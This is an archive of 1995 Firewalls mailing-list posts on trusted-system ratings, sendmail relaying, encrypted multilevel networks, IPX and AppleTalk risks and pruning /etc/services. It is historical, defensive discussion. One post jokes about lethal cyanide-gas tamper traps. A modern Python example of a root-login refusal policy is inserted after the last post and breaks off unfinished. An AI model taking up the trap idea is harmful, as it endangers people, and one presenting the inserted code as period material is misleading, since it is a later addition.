Try this one (not official, but reasonable, I believe): a trusted system is a computer system that has been determined, through a lengthy evaluation process, to implement specified security mechanisms (based upon DoD security policy) with a sufficient degree of strength to warrant the deployment of the system in commensurately risky data processing environments (based upon the ranges of data sensitivity and personnel trustworthiness supported in those environments).

> CMW (a B1 system with B2 features)

Never have I heard such a definition. The least common denominator is C2 assurance, and some A1 features are provided.

> CMWs can't hit B2 because ... they don't enforce unique access
> to devices

What is a "unique access to a device," and whence originate these misguided pontifications that latch onto one minutia like a moray eel while glossing over the other fifty important issues?

> C level systems can't keep classifications separated

At least one DoD environment that I know of has used group ID mechanisms inherent in C2 systems for mandatory separation of compartmented data.

One should have some experience designing, building, modeling, and/or documenting trusted systems before going off on various tangents about their ramifications.

"Never did tongue tell nor ear hear aught more extraordinary than that which we pretend." -- Burton

From firewalls-owner Wed Aug 2 13:55:18 1995
Message-Id: <199508021744.KAA12605@intergate.jaycor.com>
Date: Wed, 02 Aug 1995 10:44:52 -0700
To: Firewalls@GreatCircle.COM
From: scott@jaycor.com (Scott Brehm)
Subject: Passing email through a firewall

This doesn't relate directly to firewall hardware or software, but no one is responding in comp.os.sendmail, and I know someone on this list is doing this.
I am having some difficulty trying to configure my site to pass email through a firewall:

                      Internet
                         |
                    ----------
                    | router |
                    ----------
                         |
       ------------------------------------------
          |                          |
       -------                    --------
       |  A  |                    |  FW  |
       -------                    --------
                                      |------------------------
                                                          --------
                                                          |  B   |
                                                          --------

A runs primary DNS for company.com and also runs sendmail 8.6.12 and pop. It is currently configured to receive mail addressed to user@company.com and hold it for the pop users.

I am adding an inside net with B using FW. Mail for users on B will normally be received by A, which will have aliases for users who actually reside on B. Mail will normally not be addressed to user@B.company.com.

FW is a dual-homed host with routing turned off. It runs a secondary name server (from A), sendmail 8.6.12, and socks. I also have the TIS firewall toolkit available, but I am not running smap/smapd for the moment until I get the basic configuration worked out.

B is a multiuser host which has sendmail and a bunch of users which will not have access to a pop client, and therein lies the problem. How do I configure sendmail and DNS to get mail through FW?

I have three MX records:

    company.com     IN  MX  40  smtp.provider.net.
    company.com     IN  MX  30  A.company.com.
    B               IN  MX  50  FW

I was told by HP (the vendor of B) to configure sendmail on B with a DSFW.company.com line and uncomment the Ruleset 0 line to pass unresolved SMTP addresses to the SMTP relay. When I mail to user@company.com from B, I expected the mail to be sent to FW and then on to A, but instead it is timing out on a connection to smtp.provider.net. I am a little suspicious of the advice because B can obviously see the addresses outside the firewall and is trying to connect directly with those hosts.

I thought of trying another MX

    company.com     IN  MX  50  FW.company.com

but I don't care to have to wait through the timeouts. I want mail to go first time from B to FW to wherever.
I don't yet have the bat book, and the on-line help doesn't give any suggestions for configuring FW as a relay, so I am completely in the dark here. At the moment mail addressed to B can't get through (see question 1 below).

The questions:

1. How is FW supposed to be configured to accept and forward mail for B? I was told to configure FW using CWB.company.com (I ended up using Fw/etc/sendmail.cf, but that made no difference other than if user happened to have an account on FW the mail was delivered to FW rather than bouncing.)

2. How is B supposed to be configured to pass _all_ non-local mail to FW for relaying? Am I going to use the 'nullclient' feature and have even local mail go off to FW? If this is the solution, please describe the level 5 config format. B is an old box :-(.

Thanks for your help.
-----------------------------------------------------------------------
snailmail://USA/92186/CA/San_Diego/P.O.BOX_85154/JAYCOR/Scott_Brehm
voice://619-535-3144  fax://619-452-2135

From firewalls-owner Wed Aug 2 13:58:58 1995
Date: Wed, 2 Aug 1995 21:13:52 +0200
Message-Id: <199508021913.VAA28365@utrecht.knoware.nl>
To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
From: njb@knoware.nl (Niels Bjergstrom)
Subject: Re: Multilevel systems
Cc: firewalls@greatcircle.com

Padgett writes:

>Reasonable question. The problem with a multilevel protection at the firewall
>is that the external gateway is not a good place to try to separate commingled
>functions e.g. HR and Finance on the same backbone. If instead the separation
>exists between equally trusted/equally untrusted levels then a binary function
>works, for multilevel networks the only real answer is encryption.

Yes, this is a very interesting question: Should you run insecure traffic on secure networks, should you run secure traffic on unsecured networks, and is there any advantage to doing both at the same time?

So, this is not a good idea (unless using secure traffic):

                            --------- secure net A info only
                            |
  Commingled info --------[ BOX ]----- secure net B info only
                            |
                            --------- secure net C info only

whereas this is one solution to consider:

  Outside --- [ext fw] - [net A] - [int fw] - [net B] - [int fw]- [net C]
                  |                                                   |
                  -----------------------------------------------------

Here, net C could be finance, for example.

This can be considered in case you use encryption:

             Type A machine   Type B machine   Type C machine
                   |                |                |
  Outside -- [ext fw] -------------------------------------------
                   |                |                |
             Type C machine   Type C machine   Type A machine

where type Z machines can en/decrypt only traffic running on the virtual Z network.

I like the virtual secure network idea, which you obviously also recommend, very much. Have you ever tried to implement this setup in real life? What's involved in terms of e.g. en/decryption overhead? The more I think about this the better I like it: Very high virtual fences with strictly controlled gates, things to which I'm quite partial :).
If correctly set up and enforced, this philosophy should also be able to solve the eternally discussed problem of catching vira attached to mail, because the encryption process on the internal nets can be totally centrally controlled, meaning that the only way to ex/import data is through gateways that can be secured as required. Nifty...

>You mean like changing the third byte in the FBR from a 90h to "something
>else" so that DOS refuses to read it ? Change "BATCOMEXE" to BBBCCCEEE ?
>Wouldn't know about that 8*).

A bit more elaborate, I'm afraid. Ever since I first attached a (8") floppy drive to my Rockwell M65 microcomputer in 1979 through a 6522 VIA component (integrated floppy controllers were not yet available, or I couldn't afford one, I no longer recall which), and wrote a suitable file handling system to control it, I have derived a perverted pleasure from re-arranging the way info is stored on floppies :-). Incidentally, the little Rockwell computer first had a large Revox tape recorder as its mass storage device, because the Revox had a plug allowing you to control it by means of relay switches. And it had 4 kB of RAM. Later I upgraded it to 32k and wrote a full-featured floating-point math library for it.

Apologies for rambling. Seems to come with age...

Rgds, Niels

From firewalls-owner Wed Aug 2 14:32:02 1995
From: Julian Assange
Message-Id: <199508020105.LAA03134@suburbia.net>
Subject: best-of-security
To: firewalls@greatcircle.com
Date: Wed, 2 Aug 1995 11:05:52 +1000 (EST)
Cc: bugtraq@fc.net

This is partially a repost. "best-of-security" had some majordomo/sendmail headaches. With some advice from Brent Chapman I believe we have ironed these out. If you have not received mail from b-o-s in the last 24 hours, then it is most likely that you are not on the list, and need to (re)subscribe.

-Julian Assange.

Best of all available security resources.

                           Best Of Security

  "echo subscribe best-of-security|mail best-of-security-request@suburbia.net"

REASONS FOR INCEPTION
---------------------

In order to compile the average security administrator it was found that the compiler had to parse a foreboding number of exceptionally noisy and semantically-content-free data sets. This led to exceptionally high load averages and a dramatic increase in core entropy.
Further, the number, names and locations of this data appear to change on an almost daily basis, requiring tedious version control on the part of the mental maintainer.

OVERVIEW
--------

Best-of-Security is at present an un-moderated list. That may sound strange given our stated purpose of massive entropy reduction; but because best often equates with "vital" and the moderator doesn't have an MDA habit, it is important that material sent to this list be delivered to its subscribers in as minimal a period of time as is (in)humanly possible.

If you find *any* information from *any* source (including other mailing lists, newsgroups, conference notes, papers, etc) that fits into one of the acceptable categories described at the end of this document then you should *immediately* send it to "best-of-security@suburbia.net". Do not try and predict whether or not someone else will send the item in question to the list in the immediate future. Unless you're on a time-delayed mail vector such as polled uucp or the item has already appeared on best-of-security, mail the info to the list! Even if it is a widely deployed piece of information such as a CERT advisory the preceding argument still applies. If the information hasn't appeared on this list yet, then SEND IT. It is far better to run the risk of minor duplication in exchange for having the information out where it is needed than act conservatively about occasional doubling up on content.

We do, of course, take original posts. In the famous last words of CORE DIGEST: "meat, we want meat".

Consult the below lists for what we will and will not accept.

WILL WILL WILL WILL

  - 8lgm, cert, ciac, dod and other non-vendor advisories.
  - Vendor advisories of security weaknesses in own or other products.
  - Vendor new security-product line release or MAJOR upgrade.
  - Fully disclosed security weaknesses.
  - Exploitation details.
  - Exploitation code.
  - Patch code.
  - Patch announcements.
  - Hard to obtain or otherwise occulted source code or uuencoded executables.
  - Conference announcements.
  - Security tools.
  - Blond jokes.
  - NEW or hard to obtain security documents (ascii), or pointers to the location of such documents/papers.
  - Announcements of new security archives or mailing lists.
  - Human language translations of the above.

WONT WONT WONT WONT

  - Any flames.
  - Any questions.
  - Any rumors.
  - Sigs with >2 lines of commercial information.
  - Minor upgrade information.
  - "there is a hole in X"
  - Any advertising.
  - Subscription, unsubscription or mailing list queries.
  - Any requests.
  - Vague or incomprehensible statements of dysfunctional persons.
  - Opinionated rantings such as those on the ethics of full disclose or computer hackers.
  - Quotes from the Iliad.
  - Old or otherwise well known information or pointers to that information.
  - Nonsense.

From firewalls-owner Wed Aug 2 14:33:19 1995
Date: Wed, 2 Aug 95 11:40:27 PDT
From: Brad.Powell@Eng.Sun.COM ( Brad Powell SunNetworks)
Message-Id: <9508021840.AA15687@olympics.Eng.Sun.COM>
To: firewalls@greatcircle.com, mjr@iwi.com
Subject: Re: connectathon: BOGUS // testing methodologies

Okay, connectathon for firewalls has pros but a lot of cons. If we are trying to improve firewall performance then why not a "peer review"-a-thon instead.
Vendors set up their firewall, and a group of "independent" experts audit it. By independent group I mean recognized persons with nothing to gain or lose by the audit. Non-published results, but detailed findings to the vendor of the product.

Note: you don't have to have a "product" to be a vendor. If you're setting up firewalls using PD tools, and selling consulting time, then you qualify as a vendor.

Brad

From firewalls-owner Wed Aug 2 14:40:50 1995
From: "Bryan D. Boyle"
Message-Id: <9508021440.ZM8798@maverick.erenj.com>
Date: Wed, 2 Aug 1995 14:40:41 -0400
In-Reply-To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) "Re: Using multilevel systems..." (Aug 2, 11:37am)
References: <9508021537.AA17110@uvs1.orl.mmc.com>
To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
Subject: Re: Using multilevel systems...
Cc: firewalls@greatcircle.com

>
> I think most management understands that there is a problem. The bigger
> issue is that many managers feel that they know what to do about it. Think
> it was Will Rogers that said "It isn't what people don't know that is the
> problem, it's what they know that just isn't so." Managers, particularly
> middle managers in big corporations, seem to feel that to admit there is
> something they do not know is inadmissible. Even worse are experts (LAN
> experts in particular) operating out of their field.

Yeah. There are so many 'FIREWALL EXPERTS' around now that were never even in on the germinal discussions about the technology a few years ago. Notice that? But they seem to have good press agents...:) Hot topic = increase in 'experts', not necessarily an increase in knowledge.

More interesting are the management types in IS that seem to pontificate about their 'firewalls, access control auditing, and personnel policies' and still don't filter users' requests for modems for their desktop pc systems so they can load up the latest diskette from AOHell and go online that way while still connected to the internal net. "It isn't really a problem", we are told. Until something happens, right? Most security policies are full of holes like that. Has to do with the old blue way of thinking: there is only one way in, so you only have to protect that one door. Technology has moved forward faster than thinking, in some areas. Most of us understand that, but management (generic term here, folks, not to denigrate any ONE segment of the IS population) is still working on their 3270 terminals on PROFS and calling that electronic mail.

>
> Curiously, top management, if you can ever get through to them, are usually
> not a problem - guess they do not feel threatened.

Until the local media is banging down their doors to get their reaction to a subsidiary being cybervandalized (had to use that term du jour, ok? ;))

>
> >Note that hackers should fall into one of these categories, and firewalls
> >only protect against a certain, very well bounded class of these risks.
> >(a quick note: the mainframe guys DO think about this; it's the UNIX/DOS
> >world that doesn't.)

Hey, don't equate the unix weenies with the dos appliance users. ;)

> my concept of good security - you never need to know it is there unless
> something happens.

And the concept of effective secure design, too, would you agree?

Just some random thoughts for a hot August day.

--
Bryan D. Boyle            | "The real difficulty in changing any enterprise lies
#include                  | not in developing new ideas, but in escaping from
EMAIL: bdboyle@erenj.com  | the old ones."  --John Maynard Keynes
----------------------------------  --------------------

From firewalls-owner Wed Aug 2 15:34:09 1995
Date: Wed, 2 Aug 1995 17:31:41 -0500
To: firewalls@greatcircle.com
From: saltzman@shore.net (Mark Saltzman)
Subject: appletalk and ipx dangers?

Does anyone see any danger in allowing ipx and appletalk traffic to be routed through my firewall? I have ip routing disabled for obvious reasons, but I want to allow ipx and appletalk routing through the firewall. We have a remote access server set up on the "unsafe" side of the firewall which allows users ip connectivity to get out to the internet, and appletalk and ipx to get in to the corporate network.
If my internet router is not routing appletalk or ipx then I'm safe, right......?

thanks for any info,
-mark
--
Mark Saltzman
Phoenix Media/Communications Group
saltzman@shore.net

From firewalls-owner Wed Aug 2 15:54:35 1995
From: "Thomas V. Myers"
Message-Id: <199508022150.RAA17041@koicdu24.icdc.delcoelect.com>
Subject: Re: Multilevel systems
To: njb@knoware.nl (Niels Bjergstrom)
Date: Wed, 2 Aug 1995 16:50:03 -0400 (CDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <199508021913.VAA28365@utrecht.knoware.nl> from "Niels Bjergstrom" at Aug 2, 95 09:13:52 pm

njb@knoware.nl (Niels Bjergstrom) writes:

> Yes, this is a very interesting question: Should you run insecure traffic on
> secure networks, should you run secure traffic on unsecured networks, and is
> there any advantage to doing both at the same time?
>
> So, this is not a good idea (unless using secure traffic):
>
>                             --------- secure net A info only
>                             |
>   Commingled info --------[ BOX ]----- secure net B info only
>                             |
>                             --------- secure net C info only
>
> whereas this is one solution to consider:
>
>   Outside --- [ext fw] - [net A] - [int fw] - [net B] - [int fw]- [net C]
>                   |                                                   |
>                   -----------------------------------------------------
>
> Here, net C could be finance, for example.
>
> This can be considered in case you use encryption:
>
>              Type A machine   Type B machine   Type C machine
>                    |                |                |
>   Outside -- [ext fw] -------------------------------------------
>                    |                |                |
>              Type C machine   Type C machine   Type A machine
>
> where type Z machines can en/decrypt only traffic running on the virtual Z
> network.
>
> I like the virtual secure network idea, which you obviously also recommend,
> very much. Have you ever tried to implement this setup in real life? What's
> involved in terms of e.g. en/decryption overhead? The more I think about
> this the better I like it: Very high virtual fences with strictly controlled
> gates, things to which I'm quite partial :). If correctly set up and
> enforced this philosophy should also be able to solve the eternally
> discussed problem of catching vira attached to mail, because the encryption
> process on the internal nets can be totally centrally controlled, meaning
> that the only way to ex/import data is through gateways that can be secured
> as required. Nifty...

Is this type of network encryption supported by the Hughes Network Systems 'NetLock' product? It would seem that you need unique public/private key pairs for each machine and that each machine on the 'virtual Z' network would have to have the public key for every other machine on that virtual network. Distributing these keys in the first place (when the network is still insecure) would seem to be a nightmare (sniffing-spoofing, etc).

(amateur opinion, use with caution),
Tom
--
Tom Myers : tvmyers@icdc.delcoelect.com

From firewalls-owner Wed Aug 2 16:01:41 1995
From: Ruiyuan_Jiang/Advantage_KBS_at_LotusXchg@njcorp.akbs.com
Date: Wed, 02 Aug 95 18:41:00 EST
Message-Id: <9507028074.AA807414114@njcorp.akbs.com>
To: firewalls@greatcircle.com
Subject: Subnet Mask for Firewall Setup

I am in the process of setting up our internet firewall. The diagram looks like this:

  Internet <-----> Router <------> Web, ftp server <------> firewall <------> Internal LAN.

For the firewall itself I will use Livingston Firewall IRX. To set up the firewall, I was told by our service provider NetCom that we need to split our class C network further, i.e. into two subnets. One will be the external LAN (Web, ftp server). One is the internal LAN. This is the way that the router routes the packets, according to tech support at NetCom. Is it necessary to split our network, because we will lose half the addresses for our users (on the external LAN there are only several machines)?

Thanks in advance.

Ruiyuan Jiang                  (908) 287-2236
System Administrator           FAX (908) 287-3193
ADVANTAGE kbs, Inc.
rjiang@akbs.com
HP-UX Business Partner
Lotus Notes Business Partner

From firewalls-owner Wed Aug 2 16:30:00 1995
Message-Id: <199508022254.PAA04995@servo.ipsilon.com>
To: Marcus J Ranum
cc: firewalls@greatcircle.com, craiga@Ipsilon.COM
Subject: Re: connectathon: BOGUS // testing methodologies
In-reply-to: Your message of "Wed, 02 Aug 1995 10:50:15 EDT." <9508021450.AA05935@tis.com>
Date: Wed, 02 Aug 1995 15:54:19 -0700
From: Craig Anderson

>
> A connectathon will simply invite a large amount of such
> bogusness to happen over a short time in a small place.
>
> mjr.

My purpose in suggesting a Connectathon-like event was to try and remove some of the FUD from this industry (but then, that's what security is all about, right? :-). FUD hurts everyone. It's too easy for anyone to sell FUD and do nothing for the customer. The industry must have some form of accountability. Some measure of quality and objectivity.
Otherwise, how many of you consultants want to start paying for malpractice insurance? Maybe the firewall vendor audits and warrants the installation of its firewall, or leases the firewall to the customer and provides operational support for it (or through the ISP). Come on guys, you can't sell FUD forever. How do I, as a customer, know what I'm paying for? What do you say for yourselves, vendors?

Craig Anderson

From firewalls-owner Wed Aug 2 18:39:29 1995
From: PAWLUK_JEAN@tandem.com
Date: 2 Aug 95 14:33:00 +1700
Message-Id: <199508021816.AA22329@comm.tandem.com>
To: firewalls@greatcircle.com
Subject: Where are the known "den of thieves" sites ?

Being a newbie I wondered who are these known sites? Who knows about them? Where can I get that info? I've never seen an alert that says such and such site or IP address is a known source of trouble, so who is passing this info along? Are there lists?
Just Curious

From firewalls-owner Wed Aug 2 19:00:07 1995
From: "marc"
Date: 3 Aug 1995 11:05:26 +1000
To: firewalls@GreatCircle.COM, "Mark Saltzman"
Subject: RE: appletalk and ipx dangers?

Watch out for IPGATEWAYs. If you run MacIP encapsulation or IPX encapsulation on that access server, you will effectively be bypassing any firewalling of IP. Unscreened IP packets can then pass into your corporate net using the other protocols as transport.

Cheers,
Marc Bailey

_______________________________________________________________________________
From: Mark Saltzman on Thu, 3 Aug, 1995 9:03 AM
Subject: appletalk and ipx dangers?
To: firewalls@GreatCircle.COM

Does anyone see any danger in allowing ipx and appletalk traffic to be routed through my firewall? I have ip routing disabled for obvious reasons, but I want to allow ipx and appletalk routing through the firewall. We have a remote access server set up on the "unsafe" side of the firewall which allows users ip connectivity to get out to the internet, and appletalk and ipx to get in to the corporate network. If my internet router is not routing appletalk or ipx then I'm safe, right......?
thanks for any info,
-mark
--
Mark Saltzman
Phoenix Media/Communications Group
saltzman@shore.net

------------------ RFC822 Header Follows ------------------
From: saltzman@shore.net (Mark Saltzman)
Date: Wed, 2 Aug 1995 17:31:41 -0500
To: firewalls@GreatCircle.COM
Subject: appletalk and ipx dangers?
From firewalls-owner Wed Aug 2 21:31:42 1995
From: blymn@awadi.com.AU (Brett Lymn)
Date: Thu, 3 Aug 1995 13:32:29 +0930 (CST)
Message-Id: <9508030402.AA25875@bunya.awadi>
To: firewalls@greatcircle.com
Subject: Re: Problems with making / read-only

FWIW I thought I would follow up on my message about syslogd wanting a writable /dev/log. A lot of people have suggested trying a symbolic link - this does not work (at least with the Sun syslogd) because syslogd recreates the /dev/log entry when it starts up and does not follow the link when it does this. Symlinking /dev/log to where the syslogd puts the device works fine for the syslog clients but not for syslogd.

Thanks for everyone's time.

-- 
Brett Lymn, Computer Systems Administrator, AWA Defence Industries
===============================================================================
"It's fifteen hundred miles to Ankh-Morpork" he said. "We've got three hundred and sixty three elephants, fifty carts of forage, the monsoon's about to break and we're wearing ... we're wearing ... sort of things, like glass, only dark... dark glass things on our eyes..."
    - Terry Pratchett "Moving Pictures".
From firewalls-owner Wed Aug 2 23:00:06 1995
From: lbe@login.dknet.dk (Lars Bertelsen)
Date: Thu, 3 Aug 1995 07:34:42 +0200
To: firewalls@greatcircle.com
Subject: RE: appletalk and ipx dangers?

marc@bbb.com.au writes:

>>Watch out for IPGATEWAYs. If you run MacIP encapsulation or IPX encapsulation
>>on that access server, you will effectively be bypassing any firewalling of
>>IP.
>>Unscreened IP packets can then pass into your corporate net using the other
>>protocols as transport.
>>
>>Cheers,
>>Marc Bailey
>>__________________________________________________________________________
>>_____
>From: Mark Saltzman on Thu, 3 Aug, 1995 9:03 AM
>Subject: appletalk and ipx dangers?
>To: firewalls@GreatCircle.COM
>
>Does anyone see any danger in allowing ipx and appletalk traffic to be
>routed through my firewall?

(cut!)

Well, that is both true and untrue, isn't it? I suppose if the IP gateway that users connect to at dial-in time runs ON the firewall machine, then users who use this service might be able to use this mechanism to bypass the firewall. Users from the Internet wouldn't be able to, though, since the router to the internet wouldn't have to route IPX/AppleTalk.
One thing to be aware of is that if there is an IP gateway running inside the firewall in any AppleTalk zone, then a user would be able to change his setup at home to get his IP address from that one instead of the one running in the unsafe zone. That of course would give him unlimited access to the internal network and be entirely unsafe!

lbe@login.dkuug.dk
Lars Bertelsen
Gartnervang 29
Roskilde, DK

From firewalls-owner Wed Aug 2 23:15:38 1995
From: Mark
Date: Thu, 3 Aug 1995 14:48:55 +1000 (E )
Message-Id: <199508030348.AA52702@junkers.lochard.com.au>
To: firewalls@greatcircle.com
Subject: Re: IPWatcher

>1) Log, for evidence purposes, his actions
>2) Determine what holes he is exploiting
>3) Determine what machines he has exploited so you can direct your cleanup
>   efforts, and get an idea of how much damage has been done
>4) Monitor a suspicious user in realtime, and be able to terminate that
>user's connection in realtime.

This is little use when the attacker sends in a binary that opens an encrypted session for them, be it a shell on a port or whatever. It is SOP these days not to send in source code to a site but to precompile it and insert the binary.
If the user gained entry via a sniffed passwd etc. or a hijacked session and then installed their encrypted link, any software that isn't running on the host (and this can be defeated as well) will only see the encryption initiation and stream. The real break-in files are sent in-band over the encrypted stream. No real information about holes exploited or activities done is gained. Tools such as this have existed for some time and are used where the threat of detection is high or absolute privacy must be maintained. Generally the intrusion is never detected and won't be until the OS is upgraded, and even then the evidence is usually destroyed in the process.

To be frank I have little regard for this sort of tool; all you are going to do is infringe on individuals' privacy and lower your own morality. Power corrupting and all that. I can see far too many admins getting nosey about what that cute redhead in the corner is doing and watching her sessions. The instance of tools like this being used on actual legit work would be quite low.

Mark
mark@lochard.com.au

From firewalls-owner Thu Aug 3 01:00:13 1995
From: F.Wetzels@amc.uva.nl
Date: Thu, 03 Aug 1995 09:33:45 +0200
Subject: TIS on solaris 2.4?
To: firewalls@greatcircle.com
Message-id: <9508030733.AA00948@amchelix.amc.uva.nl>

I am compiling the TIS toolkit on Solaris 2.4. The compiler is complaining about the `SIOCATMARK' to be used in the `ioctl' call. It doesn't exist.

Anybody have some ideas?

Frank
-------------------------------------------------
F.P.M. Wetzels          ADIV/CNS D01-329        wetzels@amc.uva.nl
meibergdreef 15         Voice +31 20 5662917
1105 AZ Amsterdam-ZO    Fax   +31 20 6973181
-------------------------------------------------

From firewalls-owner Thu Aug 3 01:24:26 1995
From: F.Wetzels@amc.uva.nl
Date: Thu, 03 Aug 1995 09:55:04 +0200
Subject: Re: TIS on solaris 2.4?
To: firewalls@greatcircle.com
Message-id: <9508030755.AA01467@amchelix.amc.uva.nl>

fpmw> From wetzels Thu Aug 3 09:33:44 1995
fpmw> To: firewalls@greatcircle.com
fpmw> Subject: TIS on solaris 2.4?
fpmw>
fpmw> I am compiling the TIS toolkit on solaris 2.4.
fpmw> The compiler is complaining
fpmw> about the `SIOCATMARK' to be used in the `ioctl' call. It doesn't exist.
fpmw>
fpmw> Anybody some ideas?

Sorry, found it. In sys/sockio.h

Probably a braindead `grep'

-------------------------------------------------
F.P.M. Wetzels          ADIV/CNS D01-329        wetzels@amc.uva.nl
meibergdreef 15         Voice +31 20 5662917
1105 AZ Amsterdam-ZO    Fax   +31 20 6973181
-------------------------------------------------

From firewalls-owner Thu Aug 3 02:30:21 1995
From: njb@knoware.nl (Niels Bjergstrom)
Date: Thu, 3 Aug 1995 11:02:09 +0200
Message-Id: <199508030902.LAA11261@utrecht.knoware.nl>
To: "Thomas V. Myers"
Cc: firewalls@greatcircle.com
Subject: Re: Multilevel systems

Tom wrote:

>It would seem that you need unique public/private key pairs for each machine
>and that each machine on the 'virtual Z' network would have to have the
>public key for every other machine on that virtual network. Distributing
>these keys in the first place (when the network is still unsecure) would
>seem to be a nightmare (sniffing-spoofing, etc).
>
> (amateur opinion, use with caution), Tom

I obviously did not express this clearly: All machines on virtual network Z will be able to understand communication from all other machines on this virtual net and to transmit to all other machines on net Z. However, no communication between machines on different virtual networks is initially possible. Thus the solution lends itself to symmetric crypt like DES and you would not use public/private key pairs to run the network itself. Obviously, if you wish to add privacy to communication from machine Z(n) to machine Z(m) you can stick an asymmetric crypt algo on top.

Practically I think a good way to implement this would be to use special NICs incorporating small secured boxes (you could use external crypt boxes, but that would most likely mean that short pieces of external cable would carry unencrypted info). If you really want to secure this you could add small pressurised cartridges containing cyan gas, you know, the nice-smelling stuff that adversely affects breathing when hitting humid lung tissue, releasing the gas if tampered with. To deter everybody you could stick warnings on the outside of the boxes, and then again, to effectively deter the ones you REALLY would want to deter, you could refrain from doing so... Nasty.

In any case I can think of a number of elegant ways to initialise this type of system, and even to change keys regularly in a self-synchronising manner. This whole solution is so obvious that it must have been implemented (somewhat similar solutions exist e.g. for bank WANs). Anybody know of actual products built on the principles discussed?

Rgds,
Niels
------------------------------------------------------------------------
-- Niels J Bjergstrom, Ph.D., m/ISACA          Tel. +31 70 362 2269   --
-- Computer Security Engineers, Ltd.           Fax. +31 70 365 2286   --
-- Postbus 85 502, NL-2508 CE Den Haag         London: +44 181 519 8011 --
-- Netherlands                                 Email: njb@csehost.knoware.nl --
-- PGP Public key available on request - please use when mailing vira --
------------------------------------------------------------------------

From firewalls-owner Thu Aug 3 02:47:15 1995
From: Danny Cox
Date: Thu, 3 Aug 1995 10:20:58 +0100
Message-Id: <3568.9508030920@gmap.leeds.ac.uk>
To: firewalls@greatcircle.com
Subject: A couple of others in services ?

Sorry - I forgot these - ought I to keep the kerberos ports 750/udp 750/tcp or the rje port (what is this) 77/tcp?
Thanks again,
Danny

From firewalls-owner Thu Aug 3 03:01:37 1995
From: Danny Cox
Date: Thu, 3 Aug 1995 10:17:02 +0100
Message-Id: <3565.9508030917@gmap.leeds.ac.uk>
To: firewalls@greatcircle.com
Cc: dannyc@gmap3
Subject: /etc/services on Solaris

Thanks for various comments regarding cc:Mail etc. If anyone else has opinions I look forward to hearing them.

I'm going through my /etc/services file again (Solaris 2.3). The FW+Inet Security bible makes a load of recommendations about what to allow - however it doesn't consider all the entries in the default Solaris services file, viz:

    name          42/udp      nameserver
    rje           77/tcp
    hostnames     101/tcp     hostname      # usually to sri-nic
    iso-tsap      102/tcp
    x400          103/tcp
    x400-snd      104/tcp
    csnet-ns      105/tcp
    printer       515/tcp
    courier       530/tcp
    new-rwho      550/tcp     #experimental
    rmonitor      560/udp     #experimental
    pcserver      600/tcp     #experimental
    ingreslock    1524/tcp
    lockd         4045/udp    #NFS lock daemon/manager
    lockd         4045/tcp    #NFS lock daemon/manager

I'm inclined to take all of these out. I'm slightly wary as to whether I'm going to shoot myself in the foot by doing so however, as I don't really know what half of these do! We don't have any need for X.400 mail; I'm not running a printer or NFS from my firewall either.
And needless to say I'm not running Ingres on it!!!

Anyone comment upon whether I should keep any of these?

Thanks all again,
Danny

From firewalls-owner Thu Aug 3 10:08:10 1995
From: Darren Reed
Date: Fri, 4 Aug 1995 01:53:01 +1000 (EST)
Message-Id: <199508031550.IAA22775@mycroft.GreatCircle.COM>
To: Firewalls@GreatCircle.COM (Firewalls Mailing List)
Subject: preventing password accidents.

Whilst this may not be strictly a subject for firewalls, and maybe more comp.security.misc, I believe it bears more relevance to firewalls...O:)

In the many attempts to stop passwords being sent over the clear when dialing from remote locations, none of them actually do anything to stop it being typed. God knows I've done it on occasion...

What I'd like to propose is that firewalls and other systems which require the use of reusable passwords take preventative measures, to stop a potentially harmful/critical password being entered across an insecure medium. i.e. if it sees the username "root" given to the "login:" prompt, it drops the connection immediately with no "Password:" prompt sent back.
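The policy described in the paragraph above, written out as an added example that is not code from Darren's post or from any login program; the account database, the medium names and the choice of "wheel" as the trusted group are constructed assumptions.

```python
"""Drop-before-Password: policy for trusted accounts on untrusted media.

Added example modelled on the proposal above. The account data is a
constructed stand-in for /etc/passwd and /etc/group, not a real system.
"""

# Constructed sample account database (fields as in /etc/passwd and /etc/group).
SAMPLE_PASSWD = """\
root:x:0:0:Super-User:/:/bin/sh
darren:x:1001:10:Darren:/home/darren:/bin/sh
guest:x:1002:100:Guest account:/home/guest:/bin/sh
"""
SAMPLE_GROUP = """\
wheel:x:10:root,darren
users:x:100:
"""

# Media over which a reusable password would travel in the clear (assumed names).
UNTRUSTED_MEDIA = {"modem", "telnet"}
# Accesses the post says may be exempted because the channel itself is protected.
PROTECTED_MEDIA = {"ssh", "stel", "deslogin"}


def parse_passwd(text):
    """Map user name -> {"uid", "gid"} from passwd-format lines."""
    accounts = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid = line.split(":")[:4]
        accounts[name] = {"uid": int(uid), "gid": int(gid)}
    return accounts


def parse_group(text):
    """Map group name -> {"gid", "members"} from group-format lines."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":")[:4]
        groups[name] = {"gid": int(gid),
                        "members": {m for m in members.split(",") if m}}
    return groups


def trusted_accounts(accounts, groups, trusted_groups=("wheel",)):
    """Accounts the policy protects: uid 0 plus members of the trusted groups.

    Both an explicit membership entry and a matching primary gid count,
    since either one grants the group's privileges.
    """
    trusted = {name for name, acct in accounts.items() if acct["uid"] == 0}
    for gname in trusted_groups:
        group = groups.get(gname)
        if group is None:
            continue
        trusted |= group["members"]
        trusted |= {name for name, acct in accounts.items()
                    if acct["gid"] == group["gid"]}
    return trusted


def login_decision(username, medium, trusted):
    """Return ("prompt", reason) or ("drop", reason) for a login: response.

    The decision uses the user name alone, before any Password: prompt is
    sent, so a trusted account's password is never solicited over an
    untrusted medium. Unknown names are prompted like ordinary accounts.
    """
    if medium in PROTECTED_MEDIA:
        return "prompt", "channel is encrypted or uses one-time authentication"
    if medium in UNTRUSTED_MEDIA and username in trusted:
        return "drop", f"{username} is a trusted account; no Password: prompt over {medium}"
    return "prompt", "ordinary account or trusted medium"


def login_dialogue(username, medium, trusted):
    """Prompts the server emits for this attempt: a hang-up replaces Password:."""
    transcript = ["login: " + username]
    decision, _reason = login_decision(username, medium, trusted)
    transcript.append("<connection dropped>" if decision == "drop" else "Password:")
    return transcript


def demo_trusted():
    """Trusted set derived from the constructed sample database."""
    return trusted_accounts(parse_passwd(SAMPLE_PASSWD), parse_group(SAMPLE_GROUP))


if __name__ == "__main__":
    trusted = demo_trusted()
    for user, medium in (("root", "modem"), ("darren", "telnet"),
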